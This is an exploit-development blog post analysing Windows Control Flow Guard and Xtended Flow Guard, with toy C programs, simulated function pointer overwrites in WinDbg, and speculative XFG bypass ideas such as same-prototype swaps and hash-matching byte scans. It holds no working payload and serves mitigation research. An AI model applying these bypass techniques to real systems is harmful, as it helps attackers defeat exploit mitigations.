[3] https://github.com/danielbohannon/Invoke-Obfuscation
[4] https://arxiv.org/pdf/1905.09538.pdf
[5] https://www.fireeye.com/blog/threat-research/2018/07/malicious-powershell-detection-via-machine-learning.html
[6] https://github.com/danielbohannon/Revoke-Obfuscation/tree/master/DataScience
[7] https://www.powershellgallery.com/
[8] https://www.nccgroup.com/uk/our-research/managing-powershell-in-a-modern-corporate-environment/

Exploit Development: Between a Rock and a (Xtended Flow) Guard Place: Examining XFG

23 August 2020 at 00:00

Introduction

Previously, I have blogged about ROP and the benefits of understanding how it works. Not only is it a viable first-stage payload for obtaining native code execution, but it can also be leveraged for things like arbitrary read/write primitives and data-only attacks. Unfortunately, if your end goal is native code execution, there is a good chance you are going to need to overwrite a function pointer in order to hijack control flow. Taking this into consideration, Microsoft implemented Control Flow Guard, or CFG, as an optional update back in Windows 8.1. Although it was released before Windows 10, it did not really catch on in terms of “mainstream” exploitation until recent years.

After a few years, and a few bypasses along the way, Microsoft decided they needed a new Control Flow Integrity (CFI) solution - hence XFG, or Xtended Flow Guard. David Weston gave an overview of XFG at his talk at BlueHat Shanghai 2019, and it is pretty much the only public information we have at this time about XFG. This “finer-grained” CFI solution will be the subject of this blog post. A few things before we start about what this post is and what it isn’t:

  1. This post is not an “XFG internals” post. I don’t know every single low level detail about it.
  2. Don’t expect any bypasses from this post - this mitigation is still very new and not very explored.
  3. We will spend a bit of time understanding what indirect function calls are via function pointers, what CFG is, and why XFG is a very, very nice mitigation (IMO).

This is simply going to be an “organized brain dump” and isn’t meant to be a “learn everything you need to know about XFG in one sitting” post. This is just simply documenting what I have learned after messing around with XFG for a while now.

The Blueprint for XFG: CFG

CFG is a pretty well documented exploit mitigation, and I have done my fair share of documenting it as well. However, for completeness sake, let’s talk about how CFG works and its potential shortcomings.

Note that before we begin, Microsoft deserves recognition for being one of the leaders in implementing a Control Flow Integrity (CFI) initiative and among the first to actually release a CFI solution.

Firstly, to enable CFG, a program is compiled and linked with the /guard:cf flag. This can be done through the Microsoft Visual Studio tool cl (which we will look at later). However, more easily, this can be done by opening Visual Studio and navigating to Project -> Properties -> C/C++ -> Code Generation and setting Control Flow Guard to Yes (/guard:cf).

CFG at this point would now be enabled for the program - or in the case of Microsoft binaries, they would already be CFG enabled (most of them). This causes a bitmap to be created, which essentially is made up of all functions within the process space that are “protected by CFG”. Then, before an indirect function call is made (we will explore what an indirect call is shortly if you are not familiar), the function being called is sent to a special CFG function. This function checks to make sure that the function being called is a part of the CFG bitmap. If it is, the call goes through. If it isn’t, the call fails.
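Conceptually (this is a simplification for illustration, not Microsoft’s actual ntdll code; cfg_bitmap and bitmap_test are hypothetical stand-ins for the real bitmap and its lookup logic), the check behaves like:

#include <windows.h>
#include <stdint.h>
#include <intrin.h>

extern void *cfg_bitmap;                             /* hypothetical per-process CFG bitmap */
extern int bitmap_test(void *bitmap, uintptr_t fn);  /* hypothetical lookup helper */

void guard_check_icall_sketch(void *target)
{
    /* Kill the process if the call target is not a known-good function. */
    if (!bitmap_test(cfg_bitmap, (uintptr_t)target))
        __fastfail(FAST_FAIL_GUARD_ICALL_CHECK_FAILURE);
}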

Since this is a post about XFG, not CFG, we will skip over the technical details of CFG. However, if you are interested to see how CFG works at a lower level, Morten Schenk has an excellent post about its implementation in user mode (the Windows kernel has been compiled with CFG, known as kCFG, since Windows 10 1703. Note that Virtualization-Based Security, or VBS, is required for kCFG to be enforced. However, even when VBS is disabled, kCFG has some limited functionality. This is beyond the scope of this blog post).

Moving on, let’s examine how an indirect function call (e.g. call [rax] where RAX contains a function address or a function pointer), which initiates a control flow transfer to a different part of an application, looks without CFG or XFG. To do this, let’s take a look at a very simple program that performs a control flow transfer.

Note that you will need Microsoft Visual Studio 2019 Preview 16.5 or greater in order to follow along.
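A minimal reconstruction of the program described below (the exact printed string is a guess):

#include <stdio.h>

void cfgTest(void)
{
    printf("Control flow transfers are fun!\n");
}

// An array of function pointers; index 0 points at cfgTest().
void (*cfgTest1[1])(void) = { cfgTest };

int main(void)
{
    cfgTest1[0]();   // indirect call through the function pointer array
    return 0;
}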

Let’s talk about what is happening here. Firstly, this code is intentionally written this way and is obviously not the most efficient way to do this. However, it is done this way to help simulate a function pointer overwrite and the benefits of XFG/CFG.

Firstly, we have a function called void cfgTest() that just prints a sentence. This function is then assigned to a function pointer called void (*cfgTest1), which actually is an array. Then, in the main() function, the function pointer void (*cfgTest1) is executed. Since void (*cfgTest1) is pointing to void cfgTest(), this will cause void (*cfgTest1) to simply execute void cfgTest(). This will create a control flow transfer, as the main() function will perform a call to the void (*cfgTest1) function pointer, which will then call the void cfgTest() function.

To compile with the command line tool cl, type in “x64 Native Tools Command Prompt for VS 2019 Preview” in the Start menu and run the program as an administrator.

This will drop you into a special Command Prompt. From here, you will need to navigate to the installation path of Visual Studio, and you will be able to use the cl tool for compilation.

Let’s compile our program now!
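The invocation was along these lines (assuming the source file is named Source.cpp):

cl /Zi Source.cpp /link /INCREMENTAL:NO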

The above command essentially compiles the program with the /Zi flag and the /INCREMENTAL:NO linking option. Per Microsoft Docs, /Zi is used to create a .pdb file for symbols (which will be useful to us). /INCREMENTAL:NO has been set to instruct cl not to use the incremental linker. This is because the incremental linker is essentially used for optimization, which can create things like jump thunks. Jump thunks are essentially small functions that only perform a jump to another function. An example would be, instead of call function1, the program would actually perform a call j_function1. j_function1 would simply be a function that performs a jmp function1 instruction. This functionality will be turned off for brevity. Since our “dummy program” is so simple, it will be optimized very easily. Knowing this, we are disabling incremental linking in order to simulate a “Release” build (we are currently building “Debug” builds) of an application, where incremental linking would be disabled by default. However, none of this is really relevant here - just a note for the reader. Just know we are doing it for our purposes.

The result of the compilation command will place the output file, named Source.exe in this case, into the current directory along with a symbol file (.pdb). Now, we can open this application in IDA (you’ll need to run IDA as an administrator, as the application is in a privileged directory). Let’s take a look at the main() function.

Let’s examine the assembly above. The function loads the address of the void (*cfgTest1) array into RCX. Since void (*cfgTest1) is an array of function pointers, the value in RCX itself isn’t the call target - it is the base of the array. Only when RCX is dereferenced in the call qword ptr [rcx+rax] instruction does program execution actually perform a control flow transfer to void (*cfgTest1)’s first index, which is void cfgTest(). RAX holds the offset of the array index being called, which is why call qword ptr [rcx+rax] is used.

Taking a look at the call instruction in IDA, we can see that clearly this will redirect program execution to void cfgTest().

Additionally, in WinDbg, we can see that Source!cfgTest1, which is a function pointer, points to Source!cfgTest.
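
If you want to check this yourself, a command along these lines (with symbols loaded) dumps the pointer:

```
dps Source!cfgTest1 L1
```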

Nice! We know that our program will redirect execution from main() through void (*cfgTest1) and into void cfgTest()! Now, let’s say that as an attacker we had an arbitrary write primitive and were able to overwrite what void (*cfgTest1) points to. We could change where the application ends up calling! This is not good from a defensive perspective.

Can we mitigate this issue? Let’s go back and recompile our application with CFG this time and find out.

This time, we add /guard:cf as a flag, as well as a linking option.
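
Something like the following should do it (source file name assumed again):

```
cl /Zi /guard:cf Source.cpp /link /INCREMENTAL:NO /guard:cf
```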

Disassembling the main() function in IDA again, we notice things look a bit different.

Very interesting! Instead of making a call directly to void (*cfgTest1) this time, it seems as though the function pointed to by __guard_dispatch_icall_fptr will be invoked. Let’s set a breakpoint in WinDbg on main() and see how this looks after invoking the CFG dispatch function.

After setting a breakpoint on the main() function, code execution hits the CFG dispatch function.

The CFG dispatch function then performs a dereference and jumps to ntdll!LdrpDispatchUserCallTarget.

We won’t get into the technical details about what happens here, as this post isn’t built around CFG and Morten’s blog already explains what will happen. But essentially, at a high level, this function will check the CFG bitmap for the Source.exe process and determine whether the void cfgTest() function is a valid target (i.e. whether it’s in the bitmap). Obviously this function pointer hasn’t been overwritten, so we should have no problems here. After stepping through the function, control flow transfers back to the void cfgTest() function seamlessly.

Execution has returned to the void cfgTest() function. Also notable is how little overhead CFG adds to the program itself: the check is very quick because Microsoft opted to use a bitmap rather than indexing an array or some other structure.

You can also see what functions are protected by the CFG bitmap by using the dumpbin tool within the Visual Studio installation directory and the special Visual Studio Command Prompt. You can use the command dumpbin /loadconfig APPLICATION.exe to view this.

Let’s see if we can take this even further and show why XFG is definitely a better/more viable option than CFG.

CFG: Potential Shortcomings

As mentioned earlier, CFG checks functions to make sure they are part of the “CFG bitmap” (a.k.a. protected by CFG). This means a few things from an adversarial perspective. If we were to use VirtualAlloc() to allocate some virtual memory and overwrite a function pointer protected by CFG with the returned allocation address, CFG would make the program crash.
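
As a hypothetical sketch of that scenario, reusing the cfgTest1 array from our earlier program:

```c
#include <windows.h>

extern void (*cfgTest1[1])();   // the CFG-protected function pointer array

void simulateOverwrite()
{
    // Allocate fresh executable memory. This address did not exist at
    // compile time, so it is not part of the process's CFG bitmap.
    void *p = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE,
                           PAGE_EXECUTE_READWRITE);

    // Simulated arbitrary write: point cfgTest1[0] at the allocation.
    cfgTest1[0] = (void (*)())p;

    // The CFG dispatch check fails here and the process crashes.
    cfgTest1[0]();
}
```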

Why? VirtualAlloc() (for instance) would return a virtual address of something like 0xdb0000. When the application in question was compiled with CFG, this memory address obviously wasn’t part of the application, so it wouldn’t be “protected by CFG” and the program would crash. From an attacker’s standpoint, though, that scenario is not very practical anyway. Let’s think about what an adversary actually tries to accomplish with ROP.

Adversaries want to return into a Windows API function like VirtualProtect() in order to dynamically change the permissions of memory. What is interesting about CFG is that, in addition to the program’s own functions, the exported functions of the modules loaded into the process can be called. For instance, the application we are looking at is called Source.exe. Dumping the loaded modules for the application, we can see that KERNELBASE.dll, kernel32.dll, and ntdll.dll (the usual suspects) are loaded.

Let’s see if/how this could be abused!

Let’s firstly update our program with a new function.
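
A sketch of the addition (the function body is an assumption; only the function’s existence matters here):

```c
// Never executed - its sole purpose is to land in the CFG bitmap as
// another valid indirect call target.
void protectMe2()
{
    printf("You shouldn't be able to call me indirectly!\n");
}
```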

This program works exactly like the one before, except that the function void protectMe2() has been added in order to place another user defined function in the CFG bitmap. Note that this function is never executed - which is poor practice from a programmer’s perspective - but its sole purpose is to provide another protected function. This can be verified again with dumpbin.

Here, we can see that Source!cfgTest1 still points to Source!cfgTest.

Let’s recall what was said earlier about how CFG only validates whether a function resides within the CFG bitmap or not. Let’s now perform a simulated arbitrary write condition in WinDbg to overwrite what Source!cfgTest1 points to with Source!protectMe2.

The above commands use x to show the address of the Source!protectMe2 function, and then dps to show that Source!cfgTest1 still points to Source!cfgTest. Then, using ep, we overwrite the function pointer. dps once again verifies that the overwrite has occurred.
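
The sequence looks roughly like this (addresses will differ on your machine):

```
x Source!protectMe2
dps Source!cfgTest1 L1
ep Source!cfgTest1 <address of Source!protectMe2>
dps Source!cfgTest1 L1
```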

Let’s now step through the program to see what happens. Program execution firstly hits the CFG dispatch function.

Looking at the RAX register, which is used to hold the address of the function CFG will check, we see it has been overwritten with Source!protectMe2 instead of Source!cfgTest.

Execution then hits ntdll!LdrpDispatchUserCallTarget. After walking the function, which validates if the in scope function resides within the CFG bitmap for the process, execution redirects to Source!protectMe2!

This is very interesting from an adversarial perspective, as we were able to successfully overwrite a function pointer without CFG terminating our process - the only caveat being that the new target must be part of the current process’s CFG bitmap.

What is even more interesting is that function pointers protected by CFG can be overwritten with any exported function at runtime! Let’s rework this example and try to call a Windows API function like KERNELBASE!WriteProcessMemory.

First, we simulate the arbitrary write by overwriting Source!cfgTest1 with KERNELBASE!WriteProcessMemory.
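
Since WinDbg resolves symbols in expressions, the overwrite should be possible with a one-liner along these lines:

```
ep Source!cfgTest1 KERNELBASE!WriteProcessMemory
```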

Program execution passes through Source!__guard_dispatch_icall_fptr and ntdll!LdrpDispatchUserCallTarget and we can clearly see execution returns to KERNELBASE!WriteProcessMemory.

This shows that even with CFG enabled, it is still possible to call a function whose pointer has been overwritten with another valid function. This is not good, as calls can still be made with malign intent. Additionally, calling functions of different types out of context may result in type confusion or other programmatic behavioral problems.

Now that we have armed ourselves with an understanding of why CFG is an amazing start to solving the CFI problem - yet still has shortcomings - let’s get into XFG and what makes it better and different.

XFG: The Next Era of CFI for Windows

Let’s start out by talking about what XFG is at a high level. After we go through some high level details about XFG, we will compile our program with XFG and walk through the dispatch function(s), as well as perform some simulated function pointer overwrites to see how XFG reacts and additionally see how XFG differs from CFG.

My last CrowdStrike blog post touches on XFG, but not in too much detail. XFG essentially is a more “hardened” version of CFG. How so? XFG, at compile time, produces a “type-based hash” of each function that can be the target of a control flow transfer. This hash is placed 8 bytes above the target function (that is, at the function’s address minus 8) and is compared against a preserved copy of the hash when an XFG dispatch function is executed. If the hashes match, control flow is transferred to the in-scope function; if they differ, the program crashes.

Let’s take a look a bit more at this. Firstly, let’s compile our program with XFG!

Note that you will need Visual Studio 2019 Preview + at least Windows 10 21H1 in order to use XFG. Additionally, XFG is not found in the GUI compilation options.

Using the /guard:xfg flag in compilation and linking, we can enable XFG for our application.
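
As before, a command along these lines (file name assumed) enables it for both compilation and linking:

```
cl /Zi /guard:xfg Source.cpp /link /INCREMENTAL:NO /guard:xfg
```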

Notice that even though it was not selected, CFG is still enabled for our application.

Let’s crack open IDA again to see how the main() function looks with the addition of XFG.

Very interesting! Firstly, we can see that R10 is loaded with the XFG “type-based” hash. Then, a call is performed through the XFG dispatch pointer __guard_xfg_dispatch_icall_fptr. Note that the hash has been deemed “immutable” by Microsoft and cannot be modified by an attacker, due to its read-only state.

In the image below, the location of the XFG hash is at 00007ff7ded4110c.

We can see that this address is executable (obviously) and readable - with write access disabled.

Additionally, you can use the dumpbin tool to print out the functions protected by CFG/XFG. Functions protected by XFG are denoted with an X.

Before we move on, one interesting thing to note is that the XFG hash is already placed 8 bytes above an XFG protected function BEFORE any code execution actually occurs.

For instance, Source!cfgTest is an XFG protected function. 8 bytes above this function is the hash seen in the previous image, but with an additional bit set.

We will see why this additional bit has been set when we step through the functions that perform XFG checks.

Moving on, let’s step through this in WinDbg to see what we are working with here, and how execution flow will go.

Firstly, execution lands on the XFG dispatch function.

This time, when the __guard_xfg_dispatch_icall_fptr function is dereferenced, a jump to the function ntdll!LdrpDispatchUserCallTargetXFG is performed.

Firstly, a bitwise OR of the XFG hash and 1 occurs, with the result placed in R10. In our case, this sets a bit in the XFG function hash.

Next, a test al, 0xf operation occurs, which performs a bitwise AND between the lower 8 bits of AX (AL) and 0xf.

As we can see from the image above, this sets the zero flag in our case. Additionally, we have now reached a possible jump within ntdll!LdrpDispatchUserCallTargetXFG.

Since the zero flag has been set, we will NOT take the jump and instead move on to the next instruction, test ax, 0xFFF.

Stepping through test ax, 0xFFF, which performs a bitwise AND between the lower 16 bits of RAX (AX) and 0xFFF and sets the zero flag accordingly, we see in the image below that the zero flag has been cleared. This means the jump will not occur, and we continue to move deeper into the ntdll!LdrpDispatchUserCallTargetXFG function.

Finally, we land on the cmp instruction which compares the hash 8 bytes above RAX (our target function) with the hash preserved in R10.

The compare statement, because the values are equal, causes the zero flag to be set. This skips the next jump, and performs the final jump to our target function in RAX!
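
Putting the pieces together, the check we just walked through can be summarized with a loose C sketch (a reconstruction from the disassembly, not Microsoft’s actual source; the alignment tests are elided):

```c
#include <windows.h>
#include <intrin.h>

// target  = address of the function being called (what ends up in RAX)
// xfgHash = the caller-supplied type-based hash (what ends up in R10)
void xfgDispatchSketch(unsigned long long target, unsigned long long xfgHash)
{
    unsigned long long preserved = xfgHash | 1ULL;        // or r10, 1
    unsigned long long stored =
        *(unsigned long long *)(target - 8);              // hash above the target

    if (stored == preserved) {                            // cmp [rax-8], r10
        ((void (*)())target)();                           // jmp rax
    } else {
        __fastfail(FAST_FAIL_GUARD_ICALL_CHECK_FAILURE);  // mismatch: crash
    }
}
```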

This is how a function protected by XFG is checked! Let’s now edit our code a bit and explore XFG a bit more.

Let’s Keep Going!

Recall that an XFG hash is made up of a function’s return type and any parameters. Let’s update our code to invoke another function of a different type.
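
A sketch of the change (the bodies are assumptions; the prototypes are what matter):

```c
// Returns an int and takes an int - a different type than void cfgTest().
int protectMe2(int x)
{
    return x + 1;
}

// A new function pointer of the matching type.
int (*cfgTest2)(int) = protectMe2;
```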

We have changed the protectMe2() function so that it returns an integer and takes an integer parameter - different from our void cfgTest() function. We also set a function pointer, int (*cfgTest2), equal to the int protectMe2() function in order to create an XFG hash for a different function type. Let’s recompile our program and disassemble it in IDA to see how the two functions vary from an XFG perspective.

Very interesting! As we can see from the above image, there are two different hashes now. The hash for our original function has remained the same, while the hash for the int protectMe2() function is very different - although the last 12 bits of each hash are 870 in hexadecimal in our case. This is interesting and may be worth noting.

Additionally, static and dynamic analysis both show that, even before any code has executed, the actual hash is already placed 8 bytes above each function - and each hash already has the additional bit set, just as we saw last time.

Let’s take this opportunity to showcase why XFG is significantly stronger than CFG.

Let’s simulate an arbitrary write again by overwriting what Source!cfgTest1 points to with Source!protectMe2.

After simulating the arbitrary write, we pick up execution in ntdll!LdrpDispatchUserCallTargetXFG again. Stepping through a few instructions, we once again land on the cmp instruction which checks to see if the preserved XFG hash matches the current XFG hash.

As we can see below, the hashes do not match!

Since the hashes do not match, XFG determines that the function pointer has been overwritten with something it should not have been - and crashes the program. Even though the function pointer was overwritten with another function in the same bitmap, XFG still crashes the process.

Let’s examine another scenario, with two functions of the same return type - but not the same number of parameters.

To achieve this, our code has been edited to the following.
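
Something along these lines (bodies assumed):

```c
// Same return type as protectMe2, but with two additional parameters.
int cfgTest(int a, int b, int c)
{
    return a + b + c;
}

int protectMe2(int x)
{
    return x + 1;
}
```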

As we can see from the above image, we are using all-integer functions now. However, the int cfgTest() function has two more parameters than the int protectMe2() function. Let’s compile and perform some static analysis in IDA.

The only difference between the two XFG-protected functions is the number of parameters that int cfgTest() takes, and yet the hashes are TOTALLY different. From a defensive perspective, it seems that even very similar functions are viewed as “very different”.

Additionally, we notice that the last 12 bits of the int cfgTest() hash have become 371 in hexadecimal instead of the previously mentioned 871 value - the low 8 bits have stayed the same. This suggests that XFG hashes are only unique down to the last 8 bits; in other words, only roughly the upper 56 bits of the hash are unique.

As a sanity check, and for completeness’ sake, let’s see what happens when two identical functions are assigned an XFG hash.

OMG Samesies!

Here is an edited version of our code, with two identical functions.
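
For instance (bodies assumed; the prototypes are identical):

```c
int cfgTest(int a, int b, int c)
{
    return a + b + c;
}

int protectMe2(int a, int b, int c)
{
    return a * b * c;
}
```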

Disassembling the functions in IDA, we can see that the hashes this time are identical.

Obviously, since the hashing process for an XFG hash takes a function prototype and hashes it, the two hashes are going to be the same. I would not call this a flaw at all, because it is obvious Microsoft knew this going in. However, I feel this is a nice win for Microsoft in terms of their overall CFI strategy because, as David pointed out, it adds very little overhead to the already existing CFG infrastructure.

However, from an adversarial standpoint, it must be said: XFG-protected function pointers can still be overwritten, so long as the replacement function has a prototype identical to the original function’s.

Potential Bypasses?

As mentioned above, functions with identical prototypes generate identical XFG hashes. Knowing this, it seems possible to overwrite a function pointer with another function of the same prototype. Even so, this is SIGNIFICANTLY stronger than CFG in terms of which functions can actually be called.

Let’s talk about one more potential bypass.

As we know, functions protected by XFG have an XFG hash placed above them (8 bytes above, to be more specific). What would happen, for instance, if we performed a function pointer overwrite and called into the middle of a function, like KERNELBASE!VirtualProtect?

As we can see from the above image, calling into the middle of this function means these bytes are interpreted as opcodes, not memory addresses. If a function pointer is overwritten with an address inside KERNELBASE!VirtualProtect, XFG loads that address into RAX per the usual routine for XFG/CFG function checks. The address is then dereferenced at an offset of negative 8 to perform the XFG check. Since that location contains instruction bytes, the opcodes found there are what get used in the XFG comparison.

Let’s perform a function pointer overwrite.
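
In WinDbg, that could look something like this (the +0x50 offset matches what we will see in RAX shortly):

```
ep Source!cfgTest1 KERNELBASE!VirtualProtect+0x50
```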

Note that the machine was restarted in between screenshots, causing addresses to change (but the symbols will remain the same).

Next, let’s step through the XFG dispatch functions and reach the compare statement.

Hitting the compare statement, we can see that R10 contains the preserved XFG hash, while RAX just contains the address of KERNELBASE!VirtualProtect + 0x50.

Taking a look at RAX - 8, where the XFG check occurs, we can see that the opcodes residing within KERNELBASE!VirtualProtect are being treated as the “compared hash”.

Although this compare will fail, this brings up an interesting point.

Since calling into the middle of a function results in the function’s bytes being treated as opcodes rather than memory addresses (usually), it may be possible for an adversary with an arbitrary read/write primitive to do the following.

  1. Locate the XFG hash for a function you want to overwrite
  2. Perform a loop to dereference the process space’s memory and look for patterns that are identical to the XFG hash (remember, we still have to abide by CFG’s rules and choose a function exported by the application or otherwise located in the bitmap)
  3. Overwrite the function pointer with any viable candidates

Although you will most likely be very hard pressed to find opcode bytes in the middle of a function that are identical to the hash AND useful from an attacker’s perspective, it still seems possible.

Final Thoughts

Personally, I think XFG is an awesome and pretty creative mitigation, and I am excited to see how people get creative against it. However, until CET comes into play, overwriting return addresses on the stack seems like it will remain fair game; the combination of XFG and CET is going to make exploitation very interesting in the future. It also remains to be seen how XFG performs alongside Indirect Branch Tracking (IBT), CET’s forward-edge protection. All together, I think Microsoft has done a great thing by implementing XFG and not letting all of the work done on CFG go to waste.

As always! Peace, love, and positivity :-)

The Current State of Exploit Development, Part 2

20 August 2020 at 00:00

CrowdStrike Blog

Today I am very happy to have released my second blog for CrowdStrike! This blog, which builds off of my last one, talks about some additional mitigations like ACG, XFG, and VBS/HVCI which have made exploitation more expensive and time consuming. This blog rounds out the series and I hope you have found it useful! I learned a lot when I put this two part series together.

You can find the blog here. Enjoy!
